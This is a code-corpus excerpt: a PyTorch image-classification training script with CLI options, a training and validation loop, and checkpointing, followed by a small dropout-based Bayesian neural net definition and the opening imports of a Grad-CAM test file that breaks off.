group.add_argument('--lr-noise', type=float, nargs='+', default=None, metavar='pct, pct',
                   help='learning rate noise on/off epoch percentages')
group.add_argument('--lr-noise-pct', type=float, default=0.67, metavar='PERCENT',
                   help='learning rate noise limit percent (default: 0.67)')
group.add_argument('--lr-noise-std', type=float, default=1.0, metavar='STDDEV',
                   help='learning rate noise std-dev (default: 1.0)')
group.add_argument('--lr-cycle-mul', type=float, default=1.0, metavar='MULT',
                   help='learning rate cycle len multiplier (default: 1.0)')
group.add_argument('--lr-cycle-decay', type=float, default=0.5, metavar='MULT',
                   help='amount to decay each learning rate cycle (default: 0.5)')
group.add_argument('--lr-cycle-limit', type=int, default=1, metavar='N',
                   help='learning rate cycle limit, cycles enabled if > 1')
group.add_argument('--lr-k-decay', type=float, default=1.0,
                   help='learning rate k-decay for cosine/poly (default: 1.0)')
group.add_argument('--warmup-lr', type=float, default=0.0001, metavar='LR',
                   help='warmup learning rate (default: 0.0001)')
group.add_argument('--min-lr', type=float, default=1e-6, metavar='LR',
                   help='lower lr bound for cyclic schedulers that hit 0 (1e-5)')
group.add_argument('--epochs', type=int, default=300, metavar='N',
                   help='number of epochs to train (default: 300)')
group.add_argument('--epoch-repeats', type=float, default=0., metavar='N',
                   help='epoch repeat multiplier (number of times to repeat dataset epoch per train epoch).')
group.add_argument('--start-epoch', default=None, type=int, metavar='N',
                   help='manual epoch number (useful on restarts)')
group.add_argument('--decay-milestones', default=[30, 60], type=int, nargs='+', metavar="MILESTONES",
                   help='list of decay epoch indices for multistep lr. must be increasing')
group.add_argument('--decay-epochs', type=float, default=100, metavar='N',
                   help='epoch interval to decay LR')
group.add_argument('--warmup-epochs', type=int, default=3, metavar='N',
                   help='epochs to warmup LR, if scheduler supports')
group.add_argument('--cooldown-epochs', type=int, default=10, metavar='N',
                   help='epochs to cooldown LR at min_lr, after cyclic schedule ends')
group.add_argument('--patience-epochs', type=int, default=10, metavar='N',
                   help='patience epochs for Plateau LR scheduler (default: 10')
group.add_argument('--decay-rate', '--dr', type=float, default=0.1, metavar='RATE',
                   help='LR decay rate (default: 0.1)')

# Augmentation & regularization parameters
group = parser.add_argument_group('Augmentation and regularization parameters')
group.add_argument('--no-aug', action='store_true', default=False,
                   help='Disable all training augmentation, override other train aug args')
group.add_argument('--scale', type=float, nargs='+', default=[0.08, 1.0], metavar='PCT',
                   help='Random resize scale (default: 0.08 1.0)')
group.add_argument('--ratio', type=float, nargs='+', default=[3./4., 4./3.], metavar='RATIO',
                   help='Random resize aspect ratio (default: 0.75 1.33)')
group.add_argument('--hflip', type=float, default=0.5,
                   help='Horizontal flip training aug probability')
group.add_argument('--vflip', type=float, default=0.,
                   help='Vertical flip training aug probability')
group.add_argument('--color-jitter', type=float, default=0.4, metavar='PCT',
                   help='Color jitter factor (default: 0.4)')
# NOTE(review): stray trailing comma below makes this statement a 1-tuple
# expression; harmless at runtime but should eventually be removed.
group.add_argument('--aa', type=str, default=None, metavar='NAME',
                   help='Use AutoAugment policy. "v0" or "original". (default: None)'),
group.add_argument('--aug-repeats', type=float, default=0,
                   help='Number of augmentation repetitions (distributed training only) (default: 0)')
group.add_argument('--aug-splits', type=int, default=0,
                   help='Number of augmentation splits (default: 0, valid: 0 or >=2)')
group.add_argument('--jsd-loss', action='store_true', default=False,
                   help='Enable Jensen-Shannon Divergence + CE loss. Use with `--aug-splits`.')
group.add_argument('--bce-loss', action='store_true', default=False,
                   help='Enable BCE loss w/ Mixup/CutMix use.')
group.add_argument('--bce-target-thresh', type=float, default=None,
                   help='Threshold for binarizing softened BCE targets (default: None, disabled)')
group.add_argument('--reprob', type=float, default=0., metavar='PCT',
                   help='Random erase prob (default: 0.)')
group.add_argument('--remode', type=str, default='pixel',
                   help='Random erase mode (default: "pixel")')
group.add_argument('--recount', type=int, default=1,
                   help='Random erase count (default: 1)')
group.add_argument('--resplit', action='store_true', default=False,
                   help='Do not random erase first (clean) augmentation split')
group.add_argument('--mixup', type=float, default=0.0,
                   help='mixup alpha, mixup enabled if > 0. (default: 0.)')
group.add_argument('--cutmix', type=float, default=0.0,
                   help='cutmix alpha, cutmix enabled if > 0. (default: 0.)')
group.add_argument('--cutmix-minmax', type=float, nargs='+', default=None,
                   help='cutmix min/max ratio, overrides alpha and enables cutmix if set (default: None)')
group.add_argument('--mixup-prob', type=float, default=1.0,
                   help='Probability of performing mixup or cutmix when either/both is enabled')
group.add_argument('--mixup-switch-prob', type=float, default=0.5,
                   help='Probability of switching to cutmix when both mixup and cutmix enabled')
group.add_argument('--mixup-mode', type=str, default='batch',
                   help='How to apply mixup/cutmix params. Per "batch", "pair", or "elem"')
group.add_argument('--mixup-off-epoch', default=0, type=int, metavar='N',
                   help='Turn off mixup after this epoch, disabled if 0 (default: 0)')
group.add_argument('--smoothing', type=float, default=0.1,
                   help='Label smoothing (default: 0.1)')
group.add_argument('--train-interpolation', type=str, default='random',
                   help='Training interpolation (random, bilinear, bicubic default: "random")')
group.add_argument('--drop', type=float, default=0.0, metavar='PCT',
                   help='Dropout rate (default: 0.)')
group.add_argument('--drop-connect', type=float, default=None, metavar='PCT',
                   help='Drop connect rate, DEPRECATED, use drop-path (default: None)')
group.add_argument('--drop-path', type=float, default=None, metavar='PCT',
                   help='Drop path rate (default: None)')
group.add_argument('--drop-block', type=float, default=None, metavar='PCT',
                   help='Drop block rate (default: None)')

# Batch norm parameters (only works with gen_efficientnet based models currently)
group = parser.add_argument_group('Batch norm parameters', 'Only works with gen_efficientnet based models currently.')
group.add_argument('--bn-momentum', type=float, default=None,
                   help='BatchNorm momentum override (if not None)')
group.add_argument('--bn-eps', type=float, default=None,
                   help='BatchNorm epsilon override (if not None)')
group.add_argument('--sync-bn', action='store_true',
                   help='Enable NVIDIA Apex or Torch synchronized BatchNorm.')
group.add_argument('--dist-bn', type=str, default='reduce',
                   help='Distribute BatchNorm stats between nodes after each epoch ("broadcast", "reduce", or "")')
group.add_argument('--split-bn', action='store_true',
                   help='Enable separate BN layers per augmentation split.')

# Model Exponential Moving Average
group = parser.add_argument_group('Model exponential moving average parameters')
group.add_argument('--model-ema', action='store_true', default=False,
                   help='Enable tracking moving average of model weights')
group.add_argument('--model-ema-force-cpu', action='store_true', default=False,
                   help='Force ema to be tracked on CPU, rank=0 node only. Disables EMA validation.')
group.add_argument('--model-ema-decay', type=float, default=0.9998,
                   help='decay factor for model weights moving average (default: 0.9998)')

# Misc
group = parser.add_argument_group('Miscellaneous parameters')
group.add_argument('--seed', type=int, default=42, metavar='S',
                   help='random seed (default: 42)')
group.add_argument('--worker-seeding', type=str, default='all',
                   help='worker seed mode (default: all)')
group.add_argument('--log-interval', type=int, default=50, metavar='N',
                   help='how many batches to wait before logging training status')
group.add_argument('--recovery-interval', type=int, default=0, metavar='N',
                   help='how many batches to wait before writing recovery checkpoint')
group.add_argument('--checkpoint-hist', type=int, default=10, metavar='N',
                   help='number of checkpoints to keep (default: 10)')
group.add_argument('-j', '--workers', type=int, default=4, metavar='N',
                   help='how many training processes to use (default: 4)')
group.add_argument('--save-images', action='store_true', default=False,
                   help='save images of input bathes every log interval for debugging')
group.add_argument('--amp', action='store_true', default=False,
                   help='use NVIDIA Apex AMP or Native AMP for mixed precision training')
group.add_argument('--apex-amp', action='store_true', default=False,
                   help='Use NVIDIA Apex AMP mixed precision')
group.add_argument('--native-amp', action='store_true', default=False,
                   help='Use Native Torch AMP mixed precision')
group.add_argument('--no-ddp-bb', action='store_true', default=False,
                   help='Force broadcast buffers for native DDP to off.')
group.add_argument('--pin-mem', action='store_true', default=False,
                   help='Pin CPU memory in DataLoader for more efficient (sometimes) transfer to GPU.')
group.add_argument('--no-prefetcher', action='store_true', default=False,
                   help='disable fast prefetcher')
group.add_argument('--output', default='', type=str, metavar='PATH',
                   help='path to output folder (default: none, current dir)')
group.add_argument('--experiment', default='', type=str, metavar='NAME',
                   help='name of train experiment, name of sub-folder for output')
group.add_argument('--eval-metric', default='top1', type=str, metavar='EVAL_METRIC',
                   help='Best metric (default: "top1"')
group.add_argument('--tta', type=int, default=0, metavar='N',
                   help='Test/inference time augmentation (oversampling) factor. 0=None (default: 0)')
# local_rank is injected by torch.distributed.launch / torchrun.
group.add_argument("--local_rank", default=0, type=int)
group.add_argument('--use-multi-epochs-loader', action='store_true', default=False,
                   help='use the multi-epochs-loader to save time at the beginning of every epoch')
group.add_argument('--log-wandb', action='store_true', default=False,
                   help='log training and validation metrics to wandb')
def _parse_args():
    """Parse CLI arguments, honoring an optional YAML config file.

    The lightweight ``config_parser`` extracts only ``--config``; if a file
    was given, its key-values become defaults for the main parser before the
    remaining argv is parsed.

    Returns:
        Tuple of (parsed args Namespace, YAML dump of the args for saving
        alongside training output).
    """
    config_args, remaining_argv = config_parser.parse_known_args()

    # Defaults from the YAML file (if any) are still overridable on the
    # command line, since set_defaults runs before the final parse.
    if config_args.config:
        with open(config_args.config, 'r') as config_file:
            parser.set_defaults(**yaml.safe_load(config_file))

    parsed = parser.parse_args(remaining_argv)

    # Serialize the resolved args so they can be written to the output dir.
    serialized = yaml.safe_dump(parsed.__dict__, default_flow_style=False)
    return parsed, serialized
def main():
    """Full training entry point.

    Parses args, builds the model / optimizer / AMP scaffolding / data
    loaders / losses / scheduler, then runs the train+validate epoch loop
    with checkpointing.  Setup order matters: EMA is created after cuda()
    and AMP but before the DDP wrapper (see inline comments).
    """
    setup_default_logging()
    args, args_text = _parse_args()

    if args.log_wandb:
        if has_wandb:
            wandb.init(project=args.experiment, config=args)
        else:
            _logger.warning("You've requested to log metrics to wandb but package not found. "
                            "Metrics not being logged to wandb, try `pip install wandb`")

    args.prefetcher = not args.no_prefetcher
    args.distributed = False
    if 'WORLD_SIZE' in os.environ:
        # WORLD_SIZE is set by torch.distributed.launch / torchrun.
        args.distributed = int(os.environ['WORLD_SIZE']) > 1
    args.device = 'cuda:0'
    args.world_size = 1
    args.rank = 0  # global rank
    if args.distributed:
        args.device = 'cuda:%d' % args.local_rank
        torch.cuda.set_device(args.local_rank)
        torch.distributed.init_process_group(backend='nccl', init_method='env://')
        args.world_size = torch.distributed.get_world_size()
        args.rank = torch.distributed.get_rank()
        _logger.info('Training in distributed mode with multiple processes, 1 GPU per process. Process %d, total %d.'
                     % (args.rank, args.world_size))
    else:
        _logger.info('Training with a single process on 1 GPUs.')
    assert args.rank >= 0

    # resolve AMP arguments based on PyTorch / Apex availability
    use_amp = None
    if args.amp:
        # `--amp` chooses native amp before apex (APEX ver not actively maintained)
        if has_native_amp:
            args.native_amp = True
        elif has_apex:
            args.apex_amp = True
    if args.apex_amp and has_apex:
        use_amp = 'apex'
    elif args.native_amp and has_native_amp:
        use_amp = 'native'
    elif args.apex_amp or args.native_amp:
        _logger.warning("Neither APEX or native Torch AMP is available, using float32. "
                        "Install NVIDA apex or upgrade to PyTorch 1.6")

    # Seed is offset by rank so each process gets distinct augmentation streams.
    random_seed(args.seed, args.rank)

    if args.fuser:
        set_jit_fuser(args.fuser)

    model = create_model(
        args.model,
        pretrained=args.pretrained,
        num_classes=args.num_classes,
        drop_rate=args.drop,
        drop_connect_rate=args.drop_connect,  # DEPRECATED, use drop_path
        drop_path_rate=args.drop_path,
        drop_block_rate=args.drop_block,
        global_pool=args.gp,
        bn_momentum=args.bn_momentum,
        bn_eps=args.bn_eps,
        scriptable=args.torchscript,
        checkpoint_path=args.initial_checkpoint)
    if args.num_classes is None:
        assert hasattr(model, 'num_classes'), 'Model must have `num_classes` attr if not set on cmd line/config.'
        args.num_classes = model.num_classes  # FIXME handle model default vs config num_classes more elegantly

    if args.grad_checkpointing:
        model.set_grad_checkpointing(enable=True)

    if args.local_rank == 0:
        _logger.info(
            f'Model {safe_model_name(args.model)} created, param count:{sum([m.numel() for m in model.parameters()])}')

    data_config = resolve_data_config(vars(args), model=model, verbose=args.local_rank == 0)

    # setup augmentation batch splits for contrastive loss or split bn
    num_aug_splits = 0
    if args.aug_splits > 0:
        assert args.aug_splits > 1, 'A split of 1 makes no sense'
        num_aug_splits = args.aug_splits

    # enable split bn (separate bn stats per batch-portion)
    if args.split_bn:
        assert num_aug_splits > 1 or args.resplit
        model = convert_splitbn_model(model, max(num_aug_splits, 2))

    # move model to GPU, enable channels last layout if set
    model.cuda()
    if args.channels_last:
        model = model.to(memory_format=torch.channels_last)

    # setup synchronized BatchNorm for distributed training
    if args.distributed and args.sync_bn:
        assert not args.split_bn
        if has_apex and use_amp == 'apex':
            # Apex SyncBN preferred unless native amp is activated
            model = convert_syncbn_model(model)
        else:
            model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)
        if args.local_rank == 0:
            _logger.info(
                'Converted model to use Synchronized BatchNorm. WARNING: You may have issues if using '
                'zero initialized BN layers (enabled by default for ResNets) while sync-bn enabled.')

    if args.torchscript:
        assert not use_amp == 'apex', 'Cannot use APEX AMP with torchscripted model'
        assert not args.sync_bn, 'Cannot use SyncBatchNorm with torchscripted model'
        model = torch.jit.script(model)

    optimizer = create_optimizer_v2(model, **optimizer_kwargs(cfg=args))

    # setup automatic mixed-precision (AMP) loss scaling and op casting
    amp_autocast = suppress  # do nothing
    loss_scaler = None
    if use_amp == 'apex':
        model, optimizer = amp.initialize(model, optimizer, opt_level='O1')
        loss_scaler = ApexScaler()
        if args.local_rank == 0:
            _logger.info('Using NVIDIA APEX AMP. Training in mixed precision.')
    elif use_amp == 'native':
        amp_autocast = torch.cuda.amp.autocast
        loss_scaler = NativeScaler()
        if args.local_rank == 0:
            _logger.info('Using native Torch AMP. Training in mixed precision.')
    else:
        if args.local_rank == 0:
            _logger.info('AMP not enabled. Training in float32.')

    # optionally resume from a checkpoint
    resume_epoch = None
    if args.resume:
        resume_epoch = resume_checkpoint(
            model, args.resume,
            optimizer=None if args.no_resume_opt else optimizer,
            loss_scaler=None if args.no_resume_opt else loss_scaler,
            log_info=args.local_rank == 0)

    # setup exponential moving average of model weights, SWA could be used here too
    model_ema = None
    if args.model_ema:
        # Important to create EMA model after cuda(), DP wrapper, and AMP but before DDP wrapper
        model_ema = ModelEmaV2(
            model, decay=args.model_ema_decay, device='cpu' if args.model_ema_force_cpu else None)
        if args.resume:
            load_checkpoint(model_ema.module, args.resume, use_ema=True)

    # setup distributed training
    if args.distributed:
        if has_apex and use_amp == 'apex':
            # Apex DDP preferred unless native amp is activated
            if args.local_rank == 0:
                _logger.info("Using NVIDIA APEX DistributedDataParallel.")
            model = ApexDDP(model, delay_allreduce=True)
        else:
            if args.local_rank == 0:
                _logger.info("Using native Torch DistributedDataParallel.")
            model = NativeDDP(model, device_ids=[args.local_rank], broadcast_buffers=not args.no_ddp_bb)
        # NOTE: EMA model does not need to be wrapped by DDP

    # setup learning rate schedule and starting epoch
    lr_scheduler, num_epochs = create_scheduler(args, optimizer)
    start_epoch = 0
    if args.start_epoch is not None:
        # a specified start_epoch will always override the resume epoch
        start_epoch = args.start_epoch
    elif resume_epoch is not None:
        start_epoch = resume_epoch
    if lr_scheduler is not None and start_epoch > 0:
        lr_scheduler.step(start_epoch)

    if args.local_rank == 0:
        _logger.info('Scheduled epochs: {}'.format(num_epochs))

    # create the train and eval datasets
    dataset_train = create_dataset(
        args.dataset, root=args.data_dir, split=args.train_split, is_training=True,
        class_map=args.class_map,
        download=args.dataset_download,
        batch_size=args.batch_size,
        repeats=args.epoch_repeats)
    dataset_eval = create_dataset(
        args.dataset, root=args.data_dir, split=args.val_split, is_training=False,
        class_map=args.class_map,
        download=args.dataset_download,
        batch_size=args.batch_size)

    # setup mixup / cutmix
    collate_fn = None
    mixup_fn = None
    mixup_active = args.mixup > 0 or args.cutmix > 0. or args.cutmix_minmax is not None
    if mixup_active:
        mixup_args = dict(
            mixup_alpha=args.mixup, cutmix_alpha=args.cutmix, cutmix_minmax=args.cutmix_minmax,
            prob=args.mixup_prob, switch_prob=args.mixup_switch_prob, mode=args.mixup_mode,
            label_smoothing=args.smoothing, num_classes=args.num_classes)
        if args.prefetcher:
            assert not num_aug_splits  # collate conflict (need to support deinterleaving in collate mixup)
            collate_fn = FastCollateMixup(**mixup_args)
        else:
            mixup_fn = Mixup(**mixup_args)

    # wrap dataset in AugMix helper
    if num_aug_splits > 1:
        dataset_train = AugMixDataset(dataset_train, num_splits=num_aug_splits)

    # create data loaders w/ augmentation pipeiine
    train_interpolation = args.train_interpolation
    if args.no_aug or not train_interpolation:
        train_interpolation = data_config['interpolation']
    loader_train = create_loader(
        dataset_train,
        input_size=data_config['input_size'],
        batch_size=args.batch_size,
        is_training=True,
        use_prefetcher=args.prefetcher,
        no_aug=args.no_aug,
        re_prob=args.reprob,
        re_mode=args.remode,
        re_count=args.recount,
        re_split=args.resplit,
        scale=args.scale,
        ratio=args.ratio,
        hflip=args.hflip,
        vflip=args.vflip,
        color_jitter=args.color_jitter,
        auto_augment=args.aa,
        num_aug_repeats=args.aug_repeats,
        num_aug_splits=num_aug_splits,
        interpolation=train_interpolation,
        mean=data_config['mean'],
        std=data_config['std'],
        num_workers=args.workers,
        distributed=args.distributed,
        collate_fn=collate_fn,
        pin_memory=args.pin_mem,
        use_multi_epochs_loader=args.use_multi_epochs_loader,
        worker_seeding=args.worker_seeding,
    )

    loader_eval = create_loader(
        dataset_eval,
        input_size=data_config['input_size'],
        batch_size=args.validation_batch_size or args.batch_size,
        is_training=False,
        use_prefetcher=args.prefetcher,
        interpolation=data_config['interpolation'],
        mean=data_config['mean'],
        std=data_config['std'],
        num_workers=args.workers,
        distributed=args.distributed,
        crop_pct=data_config['crop_pct'],
        pin_memory=args.pin_mem,
    )

    # setup loss function
    if args.jsd_loss:
        assert num_aug_splits > 1  # JSD only valid with aug splits set
        train_loss_fn = JsdCrossEntropy(num_splits=num_aug_splits, smoothing=args.smoothing)
    elif mixup_active:
        # smoothing is handled with mixup target transform which outputs sparse, soft targets
        if args.bce_loss:
            train_loss_fn = BinaryCrossEntropy(target_threshold=args.bce_target_thresh)
        else:
            train_loss_fn = SoftTargetCrossEntropy()
    elif args.smoothing:
        if args.bce_loss:
            train_loss_fn = BinaryCrossEntropy(smoothing=args.smoothing, target_threshold=args.bce_target_thresh)
        else:
            train_loss_fn = LabelSmoothingCrossEntropy(smoothing=args.smoothing)
    else:
        train_loss_fn = nn.CrossEntropyLoss()
    train_loss_fn = train_loss_fn.cuda()
    validate_loss_fn = nn.CrossEntropyLoss().cuda()

    # setup checkpoint saver and eval metric tracking
    eval_metric = args.eval_metric
    best_metric = None
    best_epoch = None
    saver = None
    output_dir = None
    if args.rank == 0:
        # Only rank 0 writes checkpoints / summary files.
        if args.experiment:
            exp_name = args.experiment
        else:
            exp_name = '-'.join([
                datetime.now().strftime("%Y%m%d-%H%M%S"),
                safe_model_name(args.model),
                str(data_config['input_size'][-1])
            ])
        output_dir = get_outdir(args.output if args.output else './output/train', exp_name)
        decreasing = True if eval_metric == 'loss' else False
        saver = CheckpointSaver(
            model=model, optimizer=optimizer, args=args, model_ema=model_ema, amp_scaler=loss_scaler,
            checkpoint_dir=output_dir, recovery_dir=output_dir, decreasing=decreasing, max_history=args.checkpoint_hist)
        with open(os.path.join(output_dir, 'args.yaml'), 'w') as f:
            f.write(args_text)

    try:
        for epoch in range(start_epoch, num_epochs):
            if args.distributed and hasattr(loader_train.sampler, 'set_epoch'):
                loader_train.sampler.set_epoch(epoch)

            train_metrics = train_one_epoch(
                epoch, model, loader_train, optimizer, train_loss_fn, args,
                lr_scheduler=lr_scheduler, saver=saver, output_dir=output_dir,
                amp_autocast=amp_autocast, loss_scaler=loss_scaler, model_ema=model_ema, mixup_fn=mixup_fn)

            if args.distributed and args.dist_bn in ('broadcast', 'reduce'):
                if args.local_rank == 0:
                    _logger.info("Distributing BatchNorm running means and vars")
                distribute_bn(model, args.world_size, args.dist_bn == 'reduce')

            eval_metrics = validate(model, loader_eval, validate_loss_fn, args, amp_autocast=amp_autocast)

            if model_ema is not None and not args.model_ema_force_cpu:
                if args.distributed and args.dist_bn in ('broadcast', 'reduce'):
                    distribute_bn(model_ema, args.world_size, args.dist_bn == 'reduce')
                ema_eval_metrics = validate(
                    model_ema.module, loader_eval, validate_loss_fn, args, amp_autocast=amp_autocast, log_suffix=' (EMA)')
                # When EMA is active, its metrics replace the base-model metrics
                # for LR scheduling, the summary file, and checkpoint selection.
                eval_metrics = ema_eval_metrics

            if lr_scheduler is not None:
                # step LR for next epoch
                lr_scheduler.step(epoch + 1, eval_metrics[eval_metric])

            if output_dir is not None:
                update_summary(
                    epoch, train_metrics, eval_metrics, os.path.join(output_dir, 'summary.csv'),
                    write_header=best_metric is None, log_wandb=args.log_wandb and has_wandb)

            if saver is not None:
                # save proper checkpoint with eval metric
                save_metric = eval_metrics[eval_metric]
                best_metric, best_epoch = saver.save_checkpoint(epoch, metric=save_metric)

    except KeyboardInterrupt:
        # Ctrl-C exits the epoch loop cleanly so the best-metric line still prints.
        pass
    if best_metric is not None:
        _logger.info('*** Best metric: {0} (epoch {1})'.format(best_metric, best_epoch))
def train_one_epoch(
        epoch, model, loader, optimizer, loss_fn, args,
        lr_scheduler=None, saver=None, output_dir=None, amp_autocast=suppress,
        loss_scaler=None, model_ema=None, mixup_fn=None):
    """Run a single training epoch and return an OrderedDict of metrics.

    Handles optional mixup disabling, AMP autocast/scaling, gradient
    clipping, EMA weight updates, distributed loss reduction, periodic
    logging/image dumping, recovery checkpoints and per-step LR updates.
    Returns OrderedDict([('loss', mean_train_loss)]).
    """
    # Turn mixup off once the configured epoch is reached (either on the
    # prefetching loader or on the mixup function itself).
    if args.mixup_off_epoch and epoch >= args.mixup_off_epoch:
        if args.prefetcher and loader.mixup_enabled:
            loader.mixup_enabled = False
        elif mixup_fn is not None:
            mixup_fn.mixup_enabled = False

    # Second-order optimizers (e.g. AdaHessian) need create_graph=True on backward.
    second_order = hasattr(optimizer, 'is_second_order') and optimizer.is_second_order
    batch_time_m = AverageMeter()
    data_time_m = AverageMeter()
    losses_m = AverageMeter()

    model.train()

    end = time.time()
    last_idx = len(loader) - 1
    num_updates = epoch * len(loader)
    for batch_idx, (input, target) in enumerate(loader):
        last_batch = batch_idx == last_idx
        data_time_m.update(time.time() - end)
        # Without the CUDA prefetcher, tensors still live on CPU here.
        if not args.prefetcher:
            input, target = input.cuda(), target.cuda()
            if mixup_fn is not None:
                input, target = mixup_fn(input, target)
        if args.channels_last:
            input = input.contiguous(memory_format=torch.channels_last)

        with amp_autocast():
            output = model(input)
            loss = loss_fn(output, target)

        # In distributed mode the loss meter is updated later from the
        # all-reduced value (only on logging steps).
        if not args.distributed:
            losses_m.update(loss.item(), input.size(0))

        optimizer.zero_grad()
        if loss_scaler is not None:
            # AMP path: scaler handles backward, unscale, clip and step.
            loss_scaler(
                loss, optimizer,
                clip_grad=args.clip_grad, clip_mode=args.clip_mode,
                parameters=model_parameters(model, exclude_head='agc' in args.clip_mode),
                create_graph=second_order)
        else:
            loss.backward(create_graph=second_order)
            if args.clip_grad is not None:
                dispatch_clip_grad(
                    model_parameters(model, exclude_head='agc' in args.clip_mode),
                    value=args.clip_grad, mode=args.clip_mode)
            optimizer.step()

        if model_ema is not None:
            model_ema.update(model)

        torch.cuda.synchronize()
        num_updates += 1
        batch_time_m.update(time.time() - end)
        if last_batch or batch_idx % args.log_interval == 0:
            # Mean LR across parameter groups, for logging only.
            lrl = [param_group['lr'] for param_group in optimizer.param_groups]
            lr = sum(lrl) / len(lrl)

            if args.distributed:
                reduced_loss = reduce_tensor(loss.data, args.world_size)
                losses_m.update(reduced_loss.item(), input.size(0))

            if args.local_rank == 0:
                _logger.info(
                    'Train: {} [{:>4d}/{} ({:>3.0f}%)] '
                    'Loss: {loss.val:#.4g} ({loss.avg:#.3g}) '
                    'Time: {batch_time.val:.3f}s, {rate:>7.2f}/s '
                    '({batch_time.avg:.3f}s, {rate_avg:>7.2f}/s) '
                    'LR: {lr:.3e} '
                    'Data: {data_time.val:.3f} ({data_time.avg:.3f})'.format(
                        epoch,
                        batch_idx, len(loader),
                        100. * batch_idx / last_idx,
                        loss=losses_m,
                        batch_time=batch_time_m,
                        rate=input.size(0) * args.world_size / batch_time_m.val,
                        rate_avg=input.size(0) * args.world_size / batch_time_m.avg,
                        lr=lr,
                        data_time=data_time_m))

                if args.save_images and output_dir:
                    torchvision.utils.save_image(
                        input,
                        os.path.join(output_dir, 'train-batch-%d.jpg' % batch_idx),
                        padding=0,
                        normalize=True)

        # Periodic recovery checkpoint, independent of eval-metric checkpoints.
        if saver is not None and args.recovery_interval and (
                last_batch or (batch_idx + 1) % args.recovery_interval == 0):
            saver.save_recovery(epoch, batch_idx=batch_idx)

        if lr_scheduler is not None:
            lr_scheduler.step_update(num_updates=num_updates, metric=losses_m.avg)

        end = time.time()
        # end for

    if hasattr(optimizer, 'sync_lookahead'):
        optimizer.sync_lookahead()

    return OrderedDict([('loss', losses_m.avg)])
def validate(model, loader, loss_fn, args, amp_autocast=suppress, log_suffix=''):
    """Evaluate `model` over `loader` and return loss/top1/top5 metrics.

    Runs under torch.no_grad(), supports AMP autocast, test-time
    augmentation reduction (args.tta) and distributed metric reduction.
    Returns OrderedDict with keys 'loss', 'top1', 'top5'.
    """
    batch_time_m = AverageMeter()
    losses_m = AverageMeter()
    top1_m = AverageMeter()
    top5_m = AverageMeter()

    model.eval()

    end = time.time()
    last_idx = len(loader) - 1
    with torch.no_grad():
        for batch_idx, (input, target) in enumerate(loader):
            last_batch = batch_idx == last_idx
            if not args.prefetcher:
                input = input.cuda()
                target = target.cuda()
            if args.channels_last:
                input = input.contiguous(memory_format=torch.channels_last)

            with amp_autocast():
                output = model(input)
            # Some models return (logits, aux); keep only the main logits.
            if isinstance(output, (tuple, list)):
                output = output[0]

            # augmentation reduction: average logits over args.tta repeated
            # augmentations and keep every tta-th target.
            reduce_factor = args.tta
            if reduce_factor > 1:
                output = output.unfold(0, reduce_factor, reduce_factor).mean(dim=2)
                target = target[0:target.size(0):reduce_factor]

            loss = loss_fn(output, target)
            acc1, acc5 = accuracy(output, target, topk=(1, 5))

            if args.distributed:
                reduced_loss = reduce_tensor(loss.data, args.world_size)
                acc1 = reduce_tensor(acc1, args.world_size)
                acc5 = reduce_tensor(acc5, args.world_size)
            else:
                reduced_loss = loss.data

            torch.cuda.synchronize()

            losses_m.update(reduced_loss.item(), input.size(0))
            top1_m.update(acc1.item(), output.size(0))
            top5_m.update(acc5.item(), output.size(0))

            batch_time_m.update(time.time() - end)
            end = time.time()
            if args.local_rank == 0 and (last_batch or batch_idx % args.log_interval == 0):
                log_name = 'Test' + log_suffix
                _logger.info(
                    '{0}: [{1:>4d}/{2}] '
                    'Time: {batch_time.val:.3f} ({batch_time.avg:.3f}) '
                    'Loss: {loss.val:>7.4f} ({loss.avg:>6.4f}) '
                    'Acc@1: {top1.val:>7.4f} ({top1.avg:>7.4f}) '
                    'Acc@5: {top5.val:>7.4f} ({top5.avg:>7.4f})'.format(
                        log_name, batch_idx, last_idx, batch_time=batch_time_m,
                        loss=losses_m, top1=top1_m, top5=top5_m))

    metrics = OrderedDict([('loss', losses_m.avg), ('top1', top1_m.avg), ('top5', top5_m.avg)])

    return metrics
if __name__ == '__main__':
    # Script entry point: launch training when run directly.
    main()
| 49.03972 | 137 | 0.646005 |
acdf976efc269bbd1a3e23c332f4e3a77cb10b96 | 935 | py | Python | bayes_nn/model/model_definition.py | RobRomijnders/bayes_nn | f0052fd6610fb9bb00344b52745ca47bcc0cd453 | [
"MIT"
] | 29 | 2018-01-03T01:09:07.000Z | 2020-12-15T20:23:11.000Z | bayes_nn/model/model_definition.py | RobRomijnders/bayes_nn | f0052fd6610fb9bb00344b52745ca47bcc0cd453 | [
"MIT"
] | null | null | null | bayes_nn/model/model_definition.py | RobRomijnders/bayes_nn | f0052fd6610fb9bb00344b52745ca47bcc0cd453 | [
"MIT"
] | 7 | 2018-01-01T15:03:52.000Z | 2021-06-25T10:46:12.000Z | import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
from bayes_nn import conf
class Net(nn.Module):
"""
Define a simple neural net
"""
def __init__(self):
super(Net, self).__init__()
self.drop_prob = conf.drop_prob
self.conv1 = nn.Conv2d(1, conf.num_filters, kernel_size=5)
self.num_units = int((((28-5)+1)/2)**2*conf.num_filters)
self.fc1 = nn.Linear(self.num_units, conf.num_fc)
self.fc2 = nn.Linear(conf.num_fc, 10)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = x.view(-1, self.num_units)
x = F.dropout(x, training=self.training, p=self.drop_prob)
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training, p=self.drop_prob)
x = self.fc2(x)
return F.log_softmax(x) | 32.241379 | 66 | 0.638503 |
acdf97d65252cf03cdac3be78a31f85dc06cb182 | 2,268 | py | Python | tests/test_run_all_models.py | bei2/pytorch-grad-cam | c7f4a6cc26638fc668738c81ca35908ed6b1845b | [
"MIT"
] | 4,595 | 2017-05-31T21:40:32.000Z | 2022-03-31T22:38:14.000Z | tests/test_run_all_models.py | xiaosen-wang/pytorch-grad-cam | 939c279c70ba0459c6eba301e9849eb2168ad873 | [
"MIT"
] | 190 | 2017-07-12T13:59:35.000Z | 2022-03-31T20:39:30.000Z | tests/test_run_all_models.py | xiaosen-wang/pytorch-grad-cam | 939c279c70ba0459c6eba301e9849eb2168ad873 | [
"MIT"
] | 965 | 2017-06-01T04:57:26.000Z | 2022-03-31T07:43:10.000Z | import pytest
import torchvision
import torch
import cv2
from pytorch_grad_cam import GradCAM, \
ScoreCAM, \
GradCAMPlusPlus, \
AblationCAM, \
XGradCAM, \
EigenCAM, \
EigenGradCAM, \
LayerCAM, \
FullGrad
from pytorch_grad_cam.utils.image import show_cam_on_image, \
preprocess_image
@pytest.fixture
